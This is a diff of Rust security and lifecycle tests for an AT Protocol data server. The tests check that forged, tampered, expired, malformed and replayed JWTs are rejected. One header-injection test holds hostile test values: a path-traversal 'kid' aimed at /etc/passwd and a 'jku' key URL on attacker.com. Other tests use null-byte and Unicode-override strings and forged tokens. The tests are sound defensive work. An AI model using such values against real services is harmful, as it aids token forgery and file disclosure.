let result = verify_access_token(&create_custom_jwt(&header, &invalid_scope, &key_bytes), &key_bytes);
140
+
assert!(result.is_err() && result.err().unwrap().to_string().contains("Invalid token scope"));
141
142
+
let empty_scope = json!({
143
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
144
+
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
145
+
"jti": "test", "scope": ""
146
});
147
+
assert!(verify_access_token(&create_custom_jwt(&header, &empty_scope, &key_bytes), &key_bytes).is_err());
148
149
+
let missing_scope = json!({
150
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
151
+
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
152
+
"jti": "test"
153
});
154
+
assert!(verify_access_token(&create_custom_jwt(&header, &missing_scope, &key_bytes), &key_bytes).is_err());
155
+
156
+
for scope in [SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED] {
157
+
let claims = json!({
158
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
159
+
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
160
+
"jti": "test", "scope": scope
161
+
});
162
+
assert!(verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok());
163
+
}
164
+
165
+
let refresh_scope = json!({
166
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
167
+
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
168
+
"jti": "test", "scope": SCOPE_REFRESH
169
});
170
+
assert!(verify_access_token(&create_custom_jwt(&header, &refresh_scope, &key_bytes), &key_bytes).is_err());
171
}
172
173
#[test]
174
+
fn test_expiration_and_timing() {
175
let key_bytes = generate_user_key();
176
let did = "did:plc:test";
177
+
let header = json!({ "alg": "ES256K", "typ": TOKEN_TYPE_ACCESS });
178
+
let now = Utc::now().timestamp();
179
+
180
+
let expired = json!({
181
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
182
+
"iat": now - 7200, "exp": now - 3600, "jti": "test", "scope": SCOPE_ACCESS
183
});
184
+
let result = verify_access_token(&create_custom_jwt(&header, &expired, &key_bytes), &key_bytes);
185
+
assert!(result.is_err() && result.err().unwrap().to_string().contains("expired"));
186
+
187
+
let future_iat = json!({
188
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
189
+
"iat": now + 60, "exp": now + 7200, "jti": "test", "scope": SCOPE_ACCESS
190
});
191
+
assert!(verify_access_token(&create_custom_jwt(&header, &future_iat, &key_bytes), &key_bytes).is_ok());
192
193
+
let just_expired = json!({
194
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
195
+
"iat": now - 10, "exp": now - 1, "jti": "test", "scope": SCOPE_ACCESS
196
+
});
197
+
assert!(verify_access_token(&create_custom_jwt(&header, &just_expired, &key_bytes), &key_bytes).is_err());
198
199
+
let far_future = json!({
200
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
201
+
"iat": now, "exp": i64::MAX, "jti": "test", "scope": SCOPE_ACCESS
202
+
});
203
+
let _ = verify_access_token(&create_custom_jwt(&header, &far_future, &key_bytes), &key_bytes);
204
205
+
let negative_iat = json!({
206
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
207
+
"iat": -1000000000i64, "exp": now + 3600, "jti": "test", "scope": SCOPE_ACCESS
208
+
});
209
+
let _ = verify_access_token(&create_custom_jwt(&header, &negative_iat, &key_bytes), &key_bytes);
210
}
211
212
#[test]
213
+
fn test_malformed_tokens() {
214
let key_bytes = generate_user_key();
215
216
+
for token in ["", "not-a-token", "one.two", "one.two.three.four", "....",
217
+
"eyJhbGciOiJFUzI1NksifQ", "eyJhbGciOiJFUzI1NksifQ.", "eyJhbGciOiJFUzI1NksifQ..",
218
+
".eyJzdWIiOiJ0ZXN0In0.", "!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig"] {
219
+
assert!(verify_access_token(token, &key_bytes).is_err(), "Malformed token must be rejected");
220
}
221
222
let invalid_header = URL_SAFE_NO_PAD.encode("{not valid json}");
223
let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"sub":"test"}"#);
224
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]);
225
+
assert!(verify_access_token(&format!("{}.{}.{}", invalid_header, claims_b64, fake_sig), &key_bytes).is_err());
226
227
let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K","typ":"at+jwt"}"#);
228
let invalid_claims = URL_SAFE_NO_PAD.encode("{not valid json}");
229
+
assert!(verify_access_token(&format!("{}.{}.{}", header_b64, invalid_claims, fake_sig), &key_bytes).is_err());
230
}
231
232
#[test]
233
+
fn test_claim_validation() {
234
let key_bytes = generate_user_key();
235
let did = "did:plc:test";
236
+
let header = json!({ "alg": "ES256K", "typ": TOKEN_TYPE_ACCESS });
237
238
+
let missing_exp = json!({
239
+
"iss": did, "sub": did, "aud": "did:web:test",
240
+
"iat": Utc::now().timestamp(), "scope": SCOPE_ACCESS
241
});
242
+
assert!(verify_access_token(&create_custom_jwt(&header, &missing_exp, &key_bytes), &key_bytes).is_err());
243
244
+
let missing_iat = json!({
245
+
"iss": did, "sub": did, "aud": "did:web:test",
246
+
"exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS
247
});
248
+
assert!(verify_access_token(&create_custom_jwt(&header, &missing_iat, &key_bytes), &key_bytes).is_err());
249
250
+
let missing_sub = json!({
251
+
"iss": did, "aud": "did:web:test",
252
+
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS
253
+
});
254
+
assert!(verify_access_token(&create_custom_jwt(&header, &missing_sub, &key_bytes), &key_bytes).is_err());
255
256
+
let wrong_types = json!({
257
+
"iss": 12345, "sub": ["did:plc:test"], "aud": {"url": "did:web:test"},
258
+
"iat": "not a number", "exp": "also not a number", "jti": null, "scope": SCOPE_ACCESS
259
+
});
260
+
assert!(verify_access_token(&create_custom_jwt(&header, &wrong_types, &key_bytes), &key_bytes).is_err());
261
262
+
let unicode_injection = json!({
263
+
"iss": "did:plc:test\u{0000}attacker", "sub": "did:plc:test\u{202E}rekatta",
264
+
"aud": "did:web:test.pds", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
265
+
"jti": "test", "scope": SCOPE_ACCESS
266
});
267
+
if let Ok(data) = verify_access_token(&create_custom_jwt(&header, &unicode_injection, &key_bytes), &key_bytes) {
268
+
assert!(!data.claims.sub.contains('\0'));
269
+
}
270
}
271
272
#[test]
273
+
fn test_did_and_jti_extraction() {
274
let key_bytes = generate_user_key();
275
let did = "did:plc:legitimate";
276
let token = create_access_token(did, &key_bytes).expect("create token");
277
+
278
+
assert_eq!(get_did_from_token(&token).unwrap(), did);
279
assert!(get_did_from_token("invalid").is_err());
280
assert!(get_did_from_token("a.b").is_err());
281
assert!(get_did_from_token("").is_err());
282
283
+
let jti = get_jti_from_token(&token).unwrap();
284
assert!(!jti.is_empty());
285
assert!(get_jti_from_token("invalid").is_err());
286
+
287
let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K"}"#);
288
+
let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"iss":"did:plc:iss","sub":"did:plc:sub"}"#);
289
let fake_sig = URL_SAFE_NO_PAD.encode(&[0u8; 64]);
290
+
let unverified = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
291
+
assert_eq!(get_did_from_token(&unverified).unwrap(), "did:plc:sub");
292
293
+
let no_jti_claims = URL_SAFE_NO_PAD.encode(r#"{"iss":"did:plc:test"}"#);
294
+
assert!(get_jti_from_token(&format!("{}.{}.{}", header_b64, no_jti_claims, fake_sig)).is_err());
295
}
296
297
#[test]
298
+
fn test_header_injection_and_constant_time() {
299
let key_bytes = generate_user_key();
300
let did = "did:plc:test";
301
302
let header = json!({
303
+
"alg": "ES256K", "typ": TOKEN_TYPE_ACCESS,
304
+
"kid": "../../../../../../etc/passwd", "jku": "https://attacker.com/keys"
305
});
306
let claims = json!({
307
+
"iss": did, "sub": did, "aud": "did:web:test.pds",
308
+
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
309
+
"jti": "test", "scope": SCOPE_ACCESS
310
});
311
+
assert!(verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok());
312
313
+
let valid_token = create_access_token(did, &key_bytes).expect("create token");
314
+
let parts: Vec<&str> = valid_token.split('.').collect();
315
+
let mut almost_valid = URL_SAFE_NO_PAD.decode(parts[2]).unwrap();
316
+
almost_valid[0] ^= 1;
317
+
let almost_valid_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&almost_valid));
318
+
let completely_invalid_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&[0xFFu8; 64]));
319
+
let _ = verify_access_token(&almost_valid_token, &key_bytes);
320
+
let _ = verify_access_token(&completely_invalid_token, &key_bytes);
321
}
322
323
#[tokio::test]
324
+
async fn test_server_rejects_invalid_tokens() {
325
let url = base_url().await;
326
let http_client = client();
327
+
328
let key_bytes = generate_user_key();
329
+
let forged_token = create_access_token("did:plc:fake-user", &key_bytes).unwrap();
330
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
331
.header("Authorization", format!("Bearer {}", forged_token))
332
+
.send().await.unwrap();
333
+
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged token must be rejected");
334
335
let (access_jwt, _did) = create_account_and_login(&http_client).await;
336
let parts: Vec<&str> = access_jwt.split('.').collect();
337
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
338
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
339
+
340
payload["exp"] = json!(Utc::now().timestamp() - 3600);
341
+
let expired_token = format!("{}.{}.{}", parts[0], URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), parts[2]);
342
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
343
+
.header("Authorization", format!("Bearer {}", expired_token))
344
+
.send().await.unwrap();
345
+
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
346
347
+
let mut tampered_payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
348
+
tampered_payload["sub"] = json!("did:plc:attacker");
349
+
tampered_payload["iss"] = json!("did:plc:attacker");
350
+
let tampered_token = format!("{}.{}.{}", parts[0], URL_SAFE_NO_PAD.encode(serde_json::to_string(&tampered_payload).unwrap()), parts[2]);
351
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
352
.header("Authorization", format!("Bearer {}", tampered_token))
353
+
.send().await.unwrap();
354
+
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
355
}
356
357
#[tokio::test]
358
+
async fn test_authorization_header_formats() {
359
let url = base_url().await;
360
let http_client = client();
361
+
let (access_jwt, _did) = create_account_and_login(&http_client).await;
362
363
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
364
.header("Authorization", format!("Bearer {}", access_jwt))
365
+
.send().await.unwrap();
366
+
assert_eq!(res.status(), StatusCode::OK);
367
+
368
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
369
.header("Authorization", format!("bearer {}", access_jwt))
370
+
.send().await.unwrap();
371
+
assert_eq!(res.status(), StatusCode::OK);
372
+
373
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
374
.header("Authorization", format!("Basic {}", access_jwt))
375
+
.send().await.unwrap();
376
+
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
377
+
378
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
379
.header("Authorization", &access_jwt)
380
+
.send().await.unwrap();
381
+
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
382
+
383
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
384
.header("Authorization", "Bearer ")
385
+
.send().await.unwrap();
386
+
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
387
}
388
389
#[tokio::test]
390
+
async fn test_session_lifecycle_security() {
391
let url = base_url().await;
392
let http_client = client();
393
let (access_jwt, _did) = create_account_and_login(&http_client).await;
394
+
395
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
396
.header("Authorization", format!("Bearer {}", access_jwt))
397
+
.send().await.unwrap();
398
+
assert_eq!(res.status(), StatusCode::OK);
399
+
400
+
let logout = http_client.post(format!("{}/xrpc/com.atproto.server.deleteSession", url))
401
.header("Authorization", format!("Bearer {}", access_jwt))
402
+
.send().await.unwrap();
403
+
assert_eq!(logout.status(), StatusCode::OK);
404
+
405
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
406
.header("Authorization", format!("Bearer {}", access_jwt))
407
+
.send().await.unwrap();
408
+
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
409
}
410
411
#[tokio::test]
412
+
async fn test_deactivated_account_rejected() {
413
let url = base_url().await;
414
let http_client = client();
415
let (access_jwt, _did) = create_account_and_login(&http_client).await;
416
+
417
+
let deact = http_client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url))
418
.header("Authorization", format!("Bearer {}", access_jwt))
419
.json(&json!({}))
420
+
.send().await.unwrap();
421
+
assert_eq!(deact.status(), StatusCode::OK);
422
+
423
+
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
424
.header("Authorization", format!("Bearer {}", access_jwt))
425
+
.send().await.unwrap();
426
+
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
427
+
let body: Value = res.json().await.unwrap();
428
assert_eq!(body["error"], "AccountDeactivated");
429
}
430
+
431
+
#[tokio::test]
432
+
async fn test_refresh_token_replay_protection() {
433
+
let url = base_url().await;
434
+
let http_client = client();
435
+
let ts = Utc::now().timestamp_millis();
436
+
let handle = format!("rt-replay-jwt-{}", ts);
437
+
let email = format!("rt-replay-jwt-{}@example.com", ts);
438
+
439
+
let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
440
+
.json(&json!({ "handle": handle, "email": email, "password": "test-password-123" }))
441
+
.send().await.unwrap();
442
+
assert_eq!(create_res.status(), StatusCode::OK);
443
+
let account: Value = create_res.json().await.unwrap();
444
+
let did = account["did"].as_str().unwrap();
445
+
446
+
let pool = sqlx::postgres::PgPoolOptions::new()
447
+
.max_connections(2)
448
+
.connect(&get_db_connection_string().await)
449
+
.await.unwrap();
450
+
let code: String = sqlx::query_scalar!(
451
+
"SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE did = $1) AND channel = 'email'",
452
+
did
453
+
).fetch_one(&pool).await.unwrap();
454
+
455
+
let confirm = http_client.post(format!("{}/xrpc/com.atproto.server.confirmSignup", url))
456
+
.json(&json!({ "did": did, "verificationCode": code }))
457
+
.send().await.unwrap();
458
+
assert_eq!(confirm.status(), StatusCode::OK);
459
+
let confirmed: Value = confirm.json().await.unwrap();
460
+
let refresh_jwt = confirmed["refreshJwt"].as_str().unwrap().to_string();
461
+
462
+
let first = http_client.post(format!("{}/xrpc/com.atproto.server.refreshSession", url))
463
+
.header("Authorization", format!("Bearer {}", refresh_jwt))
464
+
.send().await.unwrap();
465
+
assert_eq!(first.status(), StatusCode::OK);
466
+
467
+
let replay = http_client.post(format!("{}/xrpc/com.atproto.server.refreshSession", url))
468
+
.header("Authorization", format!("Bearer {}", refresh_jwt))
469
+
.send().await.unwrap();
470
+
assert_eq!(replay.status(), StatusCode::UNAUTHORIZED);
471
+
}
+190
-1060
tests/lifecycle_record.rs
+190
-1060
tests/lifecycle_record.rs
···
8
use std::time::Duration;
9
10
#[tokio::test]
11
-
async fn test_post_crud_lifecycle() {
12
let client = client();
13
let (did, jwt) = setup_new_user("lifecycle-crud").await;
14
let collection = "app.bsky.feed.post";
···
26
}
27
});
28
let create_res = client
29
-
.post(format!(
30
-
"{}/xrpc/com.atproto.repo.putRecord",
31
-
base_url().await
32
-
))
33
.bearer_auth(&jwt)
34
.json(&create_payload)
35
.send()
36
.await
37
.expect("Failed to send create request");
38
-
if create_res.status() != reqwest::StatusCode::OK {
39
-
let status = create_res.status();
40
-
let body = create_res
41
-
.text()
42
-
.await
43
-
.unwrap_or_else(|_| "Could not get body".to_string());
44
-
panic!(
45
-
"Failed to create record. Status: {}, Body: {}",
46
-
status, body
47
-
);
48
-
}
49
-
let create_body: Value = create_res
50
-
.json()
51
-
.await
52
-
.expect("create response was not JSON");
53
let uri = create_body["uri"].as_str().unwrap();
54
-
let params = [
55
-
("repo", did.as_str()),
56
-
("collection", collection),
57
-
("rkey", &rkey),
58
-
];
59
let get_res = client
60
-
.get(format!(
61
-
"{}/xrpc/com.atproto.repo.getRecord",
62
-
base_url().await
63
-
))
64
.query(¶ms)
65
.send()
66
.await
67
.expect("Failed to send get request");
68
-
assert_eq!(
69
-
get_res.status(),
70
-
reqwest::StatusCode::OK,
71
-
"Failed to get record after create"
72
-
);
73
let get_body: Value = get_res.json().await.expect("get response was not JSON");
74
assert_eq!(get_body["uri"], uri);
75
assert_eq!(get_body["value"]["text"], original_text);
···
78
"repo": did,
79
"collection": collection,
80
"rkey": rkey,
81
-
"record": {
82
-
"$type": collection,
83
-
"text": updated_text,
84
-
"createdAt": now
85
-
}
86
});
87
let update_res = client
88
-
.post(format!(
89
-
"{}/xrpc/com.atproto.repo.putRecord",
90
-
base_url().await
91
-
))
92
.bearer_auth(&jwt)
93
.json(&update_payload)
94
.send()
95
.await
96
.expect("Failed to send update request");
97
-
assert_eq!(
98
-
update_res.status(),
99
-
reqwest::StatusCode::OK,
100
-
"Failed to update record"
101
-
);
102
let get_updated_res = client
103
-
.get(format!(
104
-
"{}/xrpc/com.atproto.repo.getRecord",
105
-
base_url().await
106
-
))
107
.query(¶ms)
108
.send()
109
.await
110
.expect("Failed to send get-after-update request");
111
-
assert_eq!(
112
-
get_updated_res.status(),
113
-
reqwest::StatusCode::OK,
114
-
"Failed to get record after update"
115
-
);
116
-
let get_updated_body: Value = get_updated_res
117
-
.json()
118
.await
119
-
.expect("get-updated response was not JSON");
120
-
assert_eq!(
121
-
get_updated_body["value"]["text"], updated_text,
122
-
"Text was not updated"
123
-
);
124
-
let delete_payload = json!({
125
"repo": did,
126
"collection": collection,
127
-
"rkey": rkey
128
});
129
let delete_res = client
130
-
.post(format!(
131
-
"{}/xrpc/com.atproto.repo.deleteRecord",
132
-
base_url().await
133
-
))
134
.bearer_auth(&jwt)
135
.json(&delete_payload)
136
.send()
137
.await
138
.expect("Failed to send delete request");
139
-
assert_eq!(
140
-
delete_res.status(),
141
-
reqwest::StatusCode::OK,
142
-
"Failed to delete record"
143
-
);
144
let get_deleted_res = client
145
-
.get(format!(
146
-
"{}/xrpc/com.atproto.repo.getRecord",
147
-
base_url().await
148
-
))
149
.query(¶ms)
150
.send()
151
.await
152
.expect("Failed to send get-after-delete request");
153
-
assert_eq!(
154
-
get_deleted_res.status(),
155
-
reqwest::StatusCode::NOT_FOUND,
156
-
"Record was found, but it should be deleted"
157
-
);
158
}
159
160
#[tokio::test]
161
-
async fn test_record_update_conflict_lifecycle() {
162
let client = client();
163
-
let (user_did, user_jwt) = setup_new_user("user-conflict").await;
164
-
let profile_payload = json!({
165
-
"repo": user_did,
166
-
"collection": "app.bsky.actor.profile",
167
-
"rkey": "self",
168
-
"record": {
169
-
"$type": "app.bsky.actor.profile",
170
-
"displayName": "Original Name"
171
-
}
172
-
});
173
-
let create_res = client
174
-
.post(format!(
175
-
"{}/xrpc/com.atproto.repo.putRecord",
176
-
base_url().await
177
-
))
178
-
.bearer_auth(&user_jwt)
179
-
.json(&profile_payload)
180
.send()
181
.await
182
-
.expect("create profile failed");
183
-
if create_res.status() != reqwest::StatusCode::OK {
184
-
return;
185
-
}
186
-
let get_res = client
187
-
.get(format!(
188
-
"{}/xrpc/com.atproto.repo.getRecord",
189
-
base_url().await
190
-
))
191
-
.query(&[
192
-
("repo", &user_did),
193
-
("collection", &"app.bsky.actor.profile".to_string()),
194
-
("rkey", &"self".to_string()),
195
-
])
196
-
.send()
197
-
.await
198
-
.expect("getRecord failed");
199
-
let get_body: Value = get_res.json().await.expect("getRecord not json");
200
-
let cid_v1 = get_body["cid"]
201
-
.as_str()
202
-
.expect("Profile v1 had no CID")
203
-
.to_string();
204
-
let update_payload_v2 = json!({
205
-
"repo": user_did,
206
-
"collection": "app.bsky.actor.profile",
207
-
"rkey": "self",
208
-
"record": {
209
-
"$type": "app.bsky.actor.profile",
210
-
"displayName": "Updated Name (v2)"
211
-
},
212
-
"swapRecord": cid_v1
213
-
});
214
-
let update_res_v2 = client
215
-
.post(format!(
216
-
"{}/xrpc/com.atproto.repo.putRecord",
217
-
base_url().await
218
-
))
219
-
.bearer_auth(&user_jwt)
220
-
.json(&update_payload_v2)
221
-
.send()
222
-
.await
223
-
.expect("putRecord v2 failed");
224
-
assert_eq!(
225
-
update_res_v2.status(),
226
-
reqwest::StatusCode::OK,
227
-
"v2 update failed"
228
-
);
229
-
let update_body_v2: Value = update_res_v2.json().await.expect("v2 body not json");
230
-
let cid_v2 = update_body_v2["cid"]
231
-
.as_str()
232
-
.expect("v2 response had no CID")
233
-
.to_string();
234
-
let update_payload_v3_stale = json!({
235
-
"repo": user_did,
236
-
"collection": "app.bsky.actor.profile",
237
-
"rkey": "self",
238
-
"record": {
239
-
"$type": "app.bsky.actor.profile",
240
-
"displayName": "Stale Update (v3)"
241
-
},
242
-
"swapRecord": cid_v1
243
-
});
244
-
let update_res_v3_stale = client
245
-
.post(format!(
246
-
"{}/xrpc/com.atproto.repo.putRecord",
247
-
base_url().await
248
-
))
249
-
.bearer_auth(&user_jwt)
250
-
.json(&update_payload_v3_stale)
251
-
.send()
252
-
.await
253
-
.expect("putRecord v3 (stale) failed");
254
-
assert_eq!(
255
-
update_res_v3_stale.status(),
256
-
reqwest::StatusCode::CONFLICT,
257
-
"Stale update did not cause a 409 Conflict"
258
-
);
259
-
let update_payload_v3_good = json!({
260
-
"repo": user_did,
261
-
"collection": "app.bsky.actor.profile",
262
-
"rkey": "self",
263
-
"record": {
264
-
"$type": "app.bsky.actor.profile",
265
-
"displayName": "Good Update (v3)"
266
-
},
267
-
"swapRecord": cid_v2
268
-
});
269
-
let update_res_v3_good = client
270
-
.post(format!(
271
-
"{}/xrpc/com.atproto.repo.putRecord",
272
-
base_url().await
273
-
))
274
-
.bearer_auth(&user_jwt)
275
-
.json(&update_payload_v3_good)
276
-
.send()
277
-
.await
278
-
.expect("putRecord v3 (good) failed");
279
-
assert_eq!(
280
-
update_res_v3_good.status(),
281
-
reqwest::StatusCode::OK,
282
-
"v3 (good) update failed"
283
-
);
284
-
}
285
-
286
-
#[tokio::test]
287
-
async fn test_profile_lifecycle() {
288
-
let client = client();
289
-
let (did, jwt) = setup_new_user("profile-lifecycle").await;
290
let profile_payload = json!({
291
"repo": did,
292
"collection": "app.bsky.actor.profile",
···
294
"record": {
295
"$type": "app.bsky.actor.profile",
296
"displayName": "Test User",
297
-
"description": "A test profile for lifecycle testing"
298
}
299
});
300
let create_res = client
301
-
.post(format!(
302
-
"{}/xrpc/com.atproto.repo.putRecord",
303
-
base_url().await
304
-
))
305
.bearer_auth(&jwt)
306
.json(&profile_payload)
307
.send()
308
.await
309
.expect("Failed to create profile");
310
-
assert_eq!(
311
-
create_res.status(),
312
-
StatusCode::OK,
313
-
"Failed to create profile"
314
-
);
315
let create_body: Value = create_res.json().await.unwrap();
316
let initial_cid = create_body["cid"].as_str().unwrap().to_string();
317
let get_res = client
318
-
.get(format!(
319
-
"{}/xrpc/com.atproto.repo.getRecord",
320
-
base_url().await
321
-
))
322
-
.query(&[
323
-
("repo", did.as_str()),
324
-
("collection", "app.bsky.actor.profile"),
325
-
("rkey", "self"),
326
-
])
327
.send()
328
.await
329
.expect("Failed to get profile");
330
assert_eq!(get_res.status(), StatusCode::OK);
331
let get_body: Value = get_res.json().await.unwrap();
332
assert_eq!(get_body["value"]["displayName"], "Test User");
333
-
assert_eq!(
334
-
get_body["value"]["description"],
335
-
"A test profile for lifecycle testing"
336
-
);
337
let update_payload = json!({
338
"repo": did,
339
"collection": "app.bsky.actor.profile",
340
"rkey": "self",
341
-
"record": {
342
-
"$type": "app.bsky.actor.profile",
343
-
"displayName": "Updated User",
344
-
"description": "Profile has been updated"
345
-
},
346
"swapRecord": initial_cid
347
});
348
let update_res = client
349
-
.post(format!(
350
-
"{}/xrpc/com.atproto.repo.putRecord",
351
-
base_url().await
352
-
))
353
.bearer_auth(&jwt)
354
.json(&update_payload)
355
.send()
356
.await
357
.expect("Failed to update profile");
358
-
assert_eq!(
359
-
update_res.status(),
360
-
StatusCode::OK,
361
-
"Failed to update profile"
362
-
);
363
let get_updated_res = client
364
-
.get(format!(
365
-
"{}/xrpc/com.atproto.repo.getRecord",
366
-
base_url().await
367
-
))
368
-
.query(&[
369
-
("repo", did.as_str()),
370
-
("collection", "app.bsky.actor.profile"),
371
-
("rkey", "self"),
372
-
])
373
.send()
374
.await
375
.expect("Failed to get updated profile");
···
382
let client = client();
383
let (alice_did, alice_jwt) = setup_new_user("alice-thread").await;
384
let (bob_did, bob_jwt) = setup_new_user("bob-thread").await;
385
-
let (root_uri, root_cid) =
386
-
create_post(&client, &alice_did, &alice_jwt, "This is the root post").await;
387
tokio::time::sleep(Duration::from_millis(100)).await;
388
let reply_collection = "app.bsky.feed.post";
389
let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis());
390
-
let now = Utc::now().to_rfc3339();
391
let reply_payload = json!({
392
"repo": bob_did,
393
"collection": reply_collection,
···
395
"record": {
396
"$type": reply_collection,
397
"text": "This is Bob's reply to Alice",
398
-
"createdAt": now,
399
"reply": {
400
-
"root": {
401
-
"uri": root_uri,
402
-
"cid": root_cid
403
-
},
404
-
"parent": {
405
-
"uri": root_uri,
406
-
"cid": root_cid
407
-
}
408
}
409
}
410
});
411
let reply_res = client
412
-
.post(format!(
413
-
"{}/xrpc/com.atproto.repo.putRecord",
414
-
base_url().await
415
-
))
416
.bearer_auth(&bob_jwt)
417
.json(&reply_payload)
418
.send()
···
423
let reply_uri = reply_body["uri"].as_str().unwrap();
424
let reply_cid = reply_body["cid"].as_str().unwrap();
425
let get_reply_res = client
426
-
.get(format!(
427
-
"{}/xrpc/com.atproto.repo.getRecord",
428
-
base_url().await
429
-
))
430
-
.query(&[
431
-
("repo", bob_did.as_str()),
432
-
("collection", reply_collection),
433
-
("rkey", reply_rkey.as_str()),
434
-
])
435
.send()
436
.await
437
.expect("Failed to get reply");
438
assert_eq!(get_reply_res.status(), StatusCode::OK);
439
let reply_record: Value = get_reply_res.json().await.unwrap();
440
assert_eq!(reply_record["value"]["reply"]["root"]["uri"], root_uri);
441
-
assert_eq!(reply_record["value"]["reply"]["parent"]["uri"], root_uri);
442
tokio::time::sleep(Duration::from_millis(100)).await;
443
let nested_reply_rkey = format!("e2e_nested_reply_{}", Utc::now().timestamp_millis());
444
let nested_payload = json!({
···
450
"text": "Alice replies to Bob's reply",
451
"createdAt": Utc::now().to_rfc3339(),
452
"reply": {
453
-
"root": {
454
-
"uri": root_uri,
455
-
"cid": root_cid
456
-
},
457
-
"parent": {
458
-
"uri": reply_uri,
459
-
"cid": reply_cid
460
-
}
461
}
462
}
463
});
464
let nested_res = client
465
-
.post(format!(
466
-
"{}/xrpc/com.atproto.repo.putRecord",
467
-
base_url().await
468
-
))
469
.bearer_auth(&alice_jwt)
470
.json(&nested_payload)
471
.send()
472
.await
473
.expect("Failed to create nested reply");
474
-
assert_eq!(
475
-
nested_res.status(),
476
-
StatusCode::OK,
477
-
"Failed to create nested reply"
478
-
);
479
-
}
480
-
481
-
#[tokio::test]
482
-
async fn test_blob_in_record_lifecycle() {
483
-
let client = client();
484
-
let (did, jwt) = setup_new_user("blob-record").await;
485
-
let blob_data = b"This is test blob data for a profile avatar";
486
-
let upload_res = client
487
-
.post(format!(
488
-
"{}/xrpc/com.atproto.repo.uploadBlob",
489
-
base_url().await
490
-
))
491
-
.header(header::CONTENT_TYPE, "text/plain")
492
-
.bearer_auth(&jwt)
493
-
.body(blob_data.to_vec())
494
-
.send()
495
-
.await
496
-
.expect("Failed to upload blob");
497
-
assert_eq!(upload_res.status(), StatusCode::OK);
498
-
let upload_body: Value = upload_res.json().await.unwrap();
499
-
let blob_ref = upload_body["blob"].clone();
500
-
let profile_payload = json!({
501
-
"repo": did,
502
-
"collection": "app.bsky.actor.profile",
503
-
"rkey": "self",
504
-
"record": {
505
-
"$type": "app.bsky.actor.profile",
506
-
"displayName": "User With Avatar",
507
-
"avatar": blob_ref
508
-
}
509
-
});
510
-
let create_res = client
511
-
.post(format!(
512
-
"{}/xrpc/com.atproto.repo.putRecord",
513
-
base_url().await
514
-
))
515
-
.bearer_auth(&jwt)
516
-
.json(&profile_payload)
517
-
.send()
518
-
.await
519
-
.expect("Failed to create profile with blob");
520
-
assert_eq!(
521
-
create_res.status(),
522
-
StatusCode::OK,
523
-
"Failed to create profile with blob"
524
-
);
525
-
let get_res = client
526
-
.get(format!(
527
-
"{}/xrpc/com.atproto.repo.getRecord",
528
-
base_url().await
529
-
))
530
-
.query(&[
531
-
("repo", did.as_str()),
532
-
("collection", "app.bsky.actor.profile"),
533
-
("rkey", "self"),
534
-
])
535
-
.send()
536
-
.await
537
-
.expect("Failed to get profile");
538
-
assert_eq!(get_res.status(), StatusCode::OK);
539
-
let profile: Value = get_res.json().await.unwrap();
540
-
assert!(profile["value"]["avatar"]["ref"]["$link"].is_string());
541
}
542
543
#[tokio::test]
544
-
async fn test_authorization_cannot_modify_other_repo() {
545
let client = client();
546
-
let (alice_did, _alice_jwt) = setup_new_user("alice-auth").await;
547
